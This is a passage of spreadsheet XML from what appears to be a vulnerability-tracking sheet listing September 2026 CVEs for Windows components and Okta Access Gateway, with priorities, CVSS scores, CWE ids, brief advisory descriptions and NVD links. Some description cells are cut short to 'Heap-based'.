          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K346" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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7" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68833</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34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48" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68833</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69415</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows DHCP Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69415</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69490</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69490</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69566</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71329</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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2" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71348</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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3" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72999</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77892</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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5" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78451</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K356"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56" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78579</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize SAML assertion attribute values before interpolating them into LDAP search filters in the LDAP datastore configuration. The raw values are substituted directly into the filter string and passed to the LDAP search operation, resulting in modification of the intended query logic.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71339</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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58" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78625</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78630</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not neutralize shell metacharacters in SNMP configuration values before a privileged script uses them to construct OS commands. An authenticated local user with access to the management interface can supply crafted values, resulting in the execution of arbitrary OS commands with root privileges.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69469</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36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61" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78545</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx server block directive, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78550</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
